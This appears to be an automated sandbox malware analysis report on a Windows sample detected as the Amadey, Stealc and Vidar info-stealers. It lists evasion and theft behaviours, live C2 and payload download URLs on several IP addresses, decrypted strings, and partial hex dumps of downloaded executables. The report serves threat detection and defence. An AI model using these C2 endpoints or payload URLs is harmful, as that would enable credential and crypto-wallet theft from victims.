Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467934
MD5: 5df47a238d51fdad9b442feb6c833886
SHA1: 9332ec9a71256cfdea81cfbf8627f0a274802b1d
SHA256: d06e1fd08af8234eb7d356343329905327126518eea8bee8e00f10aeaf7d3a09
Tags: exe

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/softokn3.dll= Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/nss3.dlldf Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/920475a59bac849d.phpI Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllhg Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exeQ Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: 85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeData Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php# Avira URL Cloud: Label: phishing
Source: http://85.28.47.30/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.30 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0.2.file.exe.4b0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
Source: explorti.exe.7548.12.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: file.exe.6436.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.30/920475a59bac849d.php"}
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 26%
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27%
Source: http://77.91.77.82/Hun4Ko/index.phpG Virustotal: Detection: 21%
Source: http://77.91.77.82/Hun4Ko/index.phpZ Virustotal: Detection: 22%
Source: http://77.91.77.82/Hun4Ko/index.php/ Virustotal: Detection: 22%
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Virustotal: Detection: 22%
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24%
Source: http://77.91.77.82/Hun4Ko/index.php- Virustotal: Detection: 21%
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Virustotal: Detection: 25%
Source: http://77.91.77.81/mine/amadka.exeQ Virustotal: Detection: 18%
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25%
Source: http://77.91.77.82/Hun4Ko/index.php9 Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe ReversingLabs: Detection: 42%
Source: file.exe Virustotal: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: http://85.28.47.30
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Nice
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4b0000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C606C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.30:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 85.28.47.30:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.30:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49744 -> 77.91.77.82:80
Source: Malware configuration extractor URLs: 85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.30/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:35:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
